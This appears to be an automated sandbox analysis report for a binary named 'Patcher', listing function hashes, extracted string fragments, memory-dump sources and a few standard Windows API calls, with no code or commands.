                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +:J6$9woI$>><3$D6B;$E$R
                                                                                              • API String ID: 0-2244865498
                                                                                              • Opcode ID: ee437c66c9a17491734ddf5e7feb17df2a77b21eca3b2907d6550661888a964a
                                                                                              • Instruction ID: c78391d455d85354c976db7674be782123a8954e0f5832fcfa1f97eec442f23b
                                                                                              • Opcode Fuzzy Hash: ee437c66c9a17491734ddf5e7feb17df2a77b21eca3b2907d6550661888a964a
                                                                                              • Instruction Fuzzy Hash: 2B61F36024D3C18AD3019F3594A435BFFF1AFA3308F28596DE8D00B382D376811A97A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >89$>89$S"(w$S"(w$f
                                                                                              • API String ID: 0-2207180035
                                                                                              • Opcode ID: 94717645699ac3882850ceba0695724713d8250f6e47f28d002b85b5a4421d6e
                                                                                              • Instruction ID: c6dd99c8307203d46e7d7a69b1dc1ea9935945f7f9771fd51be482ae0160cc5f
                                                                                              • Opcode Fuzzy Hash: 94717645699ac3882850ceba0695724713d8250f6e47f28d002b85b5a4421d6e
                                                                                              • Instruction Fuzzy Hash: 0112B17460D3519FD314CF15C89072BBBF2ABC5328F249A2DE4A95B7A1C775E805CB82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                                              • API String ID: 0-3469842109
                                                                                              • Opcode ID: b66725c3e89e8cfa2be4c1ea004f1640411405e14ed56354baf25f957000adf2
                                                                                              • Instruction ID: 5b4e5a19ce8d7c187fb443facbb0b75979c4afb487f864501ed5c549a1505368
                                                                                              • Opcode Fuzzy Hash: b66725c3e89e8cfa2be4c1ea004f1640411405e14ed56354baf25f957000adf2
                                                                                              • Instruction Fuzzy Hash: B1021570608380CFD700CF28D89075ABBE1FB96308F16852DE9958B7A2D775D91ACB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +$e$+$e$5F&D$b`$n8l
                                                                                              • API String ID: 0-2165861206
                                                                                              • Opcode ID: 9818cea51f5c5ffd9ddeb76c33e20014433efacae6250bd8ad583e0e25a804b1
                                                                                              • Instruction ID: 3657ee4f9d7c8d1fd499b77b07167e69b176b1298575bbd58e0fdc7e19aed192
                                                                                              • Opcode Fuzzy Hash: 9818cea51f5c5ffd9ddeb76c33e20014433efacae6250bd8ad583e0e25a804b1
                                                                                              • Instruction Fuzzy Hash: C03184B1249350DAD320CF6598A270FBBE0EBC6308F555D2DF2A56B281C3B28915CB4A
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDE7956
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CDE7A22
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDE7A42
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDE7A4C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 291e4b522d2348f10a736071079feb51c6da6a23fe7d779717f48d618f2c9e79
                                                                                              • Instruction ID: fda63fa200eb451eced8df92d8b68cd05e7dd8ca483e8260b9ae97cfde31e6d9
                                                                                              • Opcode Fuzzy Hash: 291e4b522d2348f10a736071079feb51c6da6a23fe7d779717f48d618f2c9e79
                                                                                              • Instruction Fuzzy Hash: B2313875D0521CEBDB51DFA0D989BCCBBB8BF08304F1041AAE40CAB250EB709B898F55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )*+$?<$Z[$q
                                                                                              • API String ID: 0-2964544060
                                                                                              • Opcode ID: dd92db4cdd059faca726fd205da3cb1eae3fa81b86723ec4fcb5a00d39754049
                                                                                              • Instruction ID: 609b7265de4bc3373b23ab21a3bac92a1c0ff680be6fdf26d43c22b9b5668584
                                                                                              • Opcode Fuzzy Hash: dd92db4cdd059faca726fd205da3cb1eae3fa81b86723ec4fcb5a00d39754049
                                                                                              • Instruction Fuzzy Hash: 4452DC716093518FD314CF65C88179BBBF1EF85318F288A2DE5998B391D778E809CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *3u&$0$nd$3'$!${v}0
                                                                                              • API String ID: 0-108575719
                                                                                              • Opcode ID: fb6a845ba7d30357fa70881062795ff642a9e2220a6b3c96f544bcc61b733500
                                                                                              • Instruction ID: 32c85379ca56270e037ed665f737693f3188cb9783b5c3e416a91dfc60c08658
                                                                                              • Opcode Fuzzy Hash: fb6a845ba7d30357fa70881062795ff642a9e2220a6b3c96f544bcc61b733500
                                                                                              • Instruction Fuzzy Hash: BC12CDB0204B428FD3198F29C4A0752FBF1FF46318B28965CD4A68BB51D779E496CBD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 2>><$89$B$~
                                                                                              • API String ID: 0-1020998186
                                                                                              • Opcode ID: fa87ad201d95b52175407a9504c3669850dbd0fb9eb8407434e53dcd2b7c20fc
                                                                                              • Instruction ID: fbbf3b1e4da957eac2969a4b9c7b6c60aaf301295592b9433807efe12eb9c7d0
                                                                                              • Opcode Fuzzy Hash: fa87ad201d95b52175407a9504c3669850dbd0fb9eb8407434e53dcd2b7c20fc
                                                                                              • Instruction Fuzzy Hash: EBC19FB120D3919BD304CF18D59036BBBE2ABD231CF24896DE4E54B791D776C91ACB82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #$# $K,K"$sp
                                                                                              • API String ID: 0-28392184
                                                                                              • Opcode ID: f155f8bd5cc5a6859a9c7b7a553625201f4fe00222aeecbdde9331943e9a0134
                                                                                              • Instruction ID: 99d7141eef6d6835b521a2913e386de8116e246ca190509aa9c67e84da58beeb
                                                                                              • Opcode Fuzzy Hash: f155f8bd5cc5a6859a9c7b7a553625201f4fe00222aeecbdde9331943e9a0134
                                                                                              • Instruction Fuzzy Hash: FD81BF71A0D3118BC314DF25C8A236BB7F2EF82328F189A5CE4D64BB91E3B48555C796
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDEBA0F
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDEBA19
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDEBA26
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: f162a81e61dfc4cb589ec210cc538cd71f4144af968be43217983d397245f931
                                                                                              • Instruction ID: d2810ce6946328cf293bf08a5123d23d9e96f753f8a035aaecaa621505dfd3b3
                                                                                              • Opcode Fuzzy Hash: f162a81e61dfc4cb589ec210cc538cd71f4144af968be43217983d397245f931
                                                                                              • Instruction Fuzzy Hash: A831C274901328EBCB61DF64D9887CDBBB8BF08314F5041EAE41CA72A1E7709B858F55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /$=$Bz
                                                                                              • API String ID: 0-2282713308
                                                                                              • Opcode ID: 8ab862868460b80af7fde9ac6c9379d1827d374d6450764770d5b9c237bcd28c
                                                                                              • Instruction ID: a407bcb406faaf0543a3cbb98e89670703d86166b349b51fede8683314c4b9a7
                                                                                              • Opcode Fuzzy Hash: 8ab862868460b80af7fde9ac6c9379d1827d374d6450764770d5b9c237bcd28c
                                                                                              • Instruction Fuzzy Hash: 0DC1D0B12087808FE314CF25D894BABBBE5EFD5308F24492DE1D58B392DB798509CB46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4=$%'$13
                                                                                              • API String ID: 0-3741504512
                                                                                              • Opcode ID: 0577566d69644ed9dca813068b24ae473dbbd59ea5134ac4cec7557243218c39
                                                                                              • Instruction ID: 18a4faa04db59d74bfd0d5fc4cdaadd616da679caf32ca3bd1b809f8745c8d0c
                                                                                              • Opcode Fuzzy Hash: 0577566d69644ed9dca813068b24ae473dbbd59ea5134ac4cec7557243218c39
                                                                                              • Instruction Fuzzy Hash: 83510FB460A3C28BE7719F11E4997ABBBF8BF86344F604E1DC4C95A205DB344245CB97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?<$^ky
                                                                                              • API String ID: 0-2910754955
                                                                                              • Opcode ID: d4849ebae9f9c9730207edd16bc98ff39b0fde52d7e5e2f37b30c9c407ecc92a
                                                                                              • Instruction ID: 01e9181ba410a0016f17a6fba2cfba7ee72e362182e40ced5bf96207f70a9d87
                                                                                              • Opcode Fuzzy Hash: d4849ebae9f9c9730207edd16bc98ff39b0fde52d7e5e2f37b30c9c407ecc92a
                                                                                              • Instruction Fuzzy Hash: 1CC103B1E183008BD7148F24C891B6BB7F1EF8531CF28896CE88597B91E735D919C792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: spqv$w
                                                                                              • API String ID: 0-2043734049
                                                                                              • Opcode ID: 09f3bceef1b88f2ee6b120f4d90ffe4274c819f688372e943f4f809d9ebc5871
                                                                                              • Instruction ID: e7183c20e330ce62ef7c7be0704d9b17cb8d2e88f699112057f4681183a0abb8
                                                                                              • Opcode Fuzzy Hash: 09f3bceef1b88f2ee6b120f4d90ffe4274c819f688372e943f4f809d9ebc5871
                                                                                              • Instruction Fuzzy Hash: D3A10632A0C2614BC715CE28885025BBBF1AB86328F29877DE8F99BBD5D734C915C7D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gfff$ur
                                                                                              • API String ID: 0-3605534975
                                                                                              • Opcode ID: 0c862a9c4d3da88ad5dd09ec0ad9594dbb647184db805ff153f404c0a2e4cd1f
                                                                                              • Instruction ID: f8a166d8c285fb01a25f6c91d8e4ec5a56ec5a973917f445f5d7622279861dba
                                                                                              • Opcode Fuzzy Hash: 0c862a9c4d3da88ad5dd09ec0ad9594dbb647184db805ff153f404c0a2e4cd1f
                                                                                              • Instruction Fuzzy Hash: 4C7139716582414BD314CF29CC917ABB7E2EBC5318F19863EE46ACBBD1EB788416C780
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 1S+h$Ly}
                                                                                              • API String ID: 0-3679238603
                                                                                              • Opcode ID: e652fcc3fe86a75576612a26a499def38f3bb261e6905a45d4b7a647d3b1af64
                                                                                              • Instruction ID: 75b747c8cfb2fed05d719d1aa27ed5de0b1fac7a9c346564a679b8f960c65011
                                                                                              • Opcode Fuzzy Hash: e652fcc3fe86a75576612a26a499def38f3bb261e6905a45d4b7a647d3b1af64
                                                                                              • Instruction Fuzzy Hash: 5361F07161C7808BC314CF68D8907ABBBE2AFC6718F184A2DF0D59B791D7798805CB46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: /JN$DB@H
                                                                                              • API String ID: 0-1686243971
                                                                                              • Opcode ID: e62e45f54d1c1dab785a7b2b08b3f011dc8d116ae7cdee81362f892b2c383331
                                                                                              • Instruction ID: 9b62679fb170f7e475c12fc50f4a257c953c348ff5daedd0a2aeb4f999d6a66a
                                                                                              • Opcode Fuzzy Hash: e62e45f54d1c1dab785a7b2b08b3f011dc8d116ae7cdee81362f892b2c383331
                                                                                              • Instruction Fuzzy Hash: 4F510831A493818BD724CE6888B13A7BBF1DF96318F284A2DC9E547BC1D7389545D782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &2$sa
                                                                                              • API String ID: 0-4107202647
                                                                                              • Opcode ID: 1a121e13bfacfef05548e08bd6d6dde6566c182ad19854b8e9771ba1a7ce5ff3
                                                                                              • Instruction ID: 6781918ad335653639276ee7931c6829a49a6a20f09acc250123d7a59cb4ce70
                                                                                              • Opcode Fuzzy Hash: 1a121e13bfacfef05548e08bd6d6dde6566c182ad19854b8e9771ba1a7ce5ff3
                                                                                              • Instruction Fuzzy Hash: 4321E46565C2018BD7049F39CC2267BB7F4EF82368F191A1CE492CBB90E3788914C796
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `AO
                                                                                              • API String ID: 0-2485448509
                                                                                              • Opcode ID: f7f1e0fbed494c9eededcfd808db71552806049954af70215b646fba5944d781
                                                                                              • Instruction ID: 65c8766b2430fdd0a969f47a3e2433d4d33f8c8fa7248212a92091381ebbc8d2
                                                                                              • Opcode Fuzzy Hash: f7f1e0fbed494c9eededcfd808db71552806049954af70215b646fba5944d781
                                                                                              • Instruction Fuzzy Hash: 6132CD76A45306CFCB04CFACC9997DDBBF2AB4A318F20851AD868EB775C6359945CB00
                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDF2570,?,?,00000008,?,?,6CDF2173,00000000), ref: 6CDF27A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 3aef1e83129dd35242b1b981618172409c48924acfae0381674aabe0b04ca2a6
                                                                                              • Instruction ID: 4641e166f6e358b56acc1e2b36686db8072342397a8c783a652f2dec018829b1
                                                                                              • Opcode Fuzzy Hash: 3aef1e83129dd35242b1b981618172409c48924acfae0381674aabe0b04ca2a6
                                                                                              • Instruction Fuzzy Hash: 29B12731611648DFD705CF28C48AB557BE0FF45368F268698E8A9CF6B2C735E992CB40
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5N
                                                                                              • API String ID: 0-1921826014
                                                                                              • Opcode ID: 91bd1fe48ab29a43cbec9efc9b78d9d89122ee0315af38343d23f7cf4871b41d
                                                                                              • Instruction ID: da9152bab51a9d9cbf15c1ea4550e66009a52e837da6b2c951cfe620de025a48
                                                                                              • Opcode Fuzzy Hash: 91bd1fe48ab29a43cbec9efc9b78d9d89122ee0315af38343d23f7cf4871b41d
                                                                                              • Instruction Fuzzy Hash: 85D189B1A083408BD310DF29C895B6BBBF5FF86718F244A1CE5858B791E776D805CB52
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: NP,?
                                                                                              • API String ID: 0-3110377521
                                                                                              • Opcode ID: 42873e813488bb0845b286b8be6e89770c77990e39914ec0d5efcdfe7d1beac0
                                                                                              • Instruction ID: 8d9a4bb2c0bd24db18ef5f93b263c018314407c4dd7da264ee18191a8becdb5a
                                                                                              • Opcode Fuzzy Hash: 42873e813488bb0845b286b8be6e89770c77990e39914ec0d5efcdfe7d1beac0
                                                                                              • Instruction Fuzzy Hash: 7FB12375A093208BD310CF25CC8166BB7BABBC531CF34A62CE96C8B791DB71A805C791
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDE7B2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: f6790d87a691dfd668ee393d3a72f9fc9418d374eb686417f5a02a891c4363ca
                                                                                              • Instruction ID: 02fd0cd46dd84df54fd954801a668942b27c955cf1c4871c8db7c334399496f2
                                                                                              • Opcode Fuzzy Hash: f6790d87a691dfd668ee393d3a72f9fc9418d374eb686417f5a02a891c4363ca
                                                                                              • Instruction Fuzzy Hash: 4251BDB1A02615DBEB14DF64C5C17AEBBF4FB08328F22C46AC425EB251D374A941CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Wuv7
                                                                                              • API String ID: 0-3833346499
                                                                                              • Opcode ID: e0568ffd1def9414dec621379e4d1470ffa52aa65a7c5a573b869b774917d0f4
                                                                                              • Instruction ID: 65dd089db0663ed11e646210d453da074fcc98b17bf9fb3f3d98b87035ac5da7
                                                                                              • Opcode Fuzzy Hash: e0568ffd1def9414dec621379e4d1470ffa52aa65a7c5a573b869b774917d0f4
                                                                                              • Instruction Fuzzy Hash: ABA10776B193119BC314CF68CC8176BB7E1EB85318F29962CE8A9CB790D635ED05C782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EwiE
                                                                                              • API String ID: 0-1857645623
                                                                                              • Opcode ID: eb3df69df86d09d10f3dbef0b8aed307c140d6c82ff019a68727dab204aa46c6
                                                                                              • Instruction ID: 99f088345a2594777368a87e759ca8f2b7908cbaf77d915bb76797c92418d77c
                                                                                              • Opcode Fuzzy Hash: eb3df69df86d09d10f3dbef0b8aed307c140d6c82ff019a68727dab204aa46c6
                                                                                              • Instruction Fuzzy Hash: 87B102756083128BD310CF19C89025BB7F1FF99318F188A2DE8D59B764E7789905CB86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: a
                                                                                              • API String ID: 0-3904355907
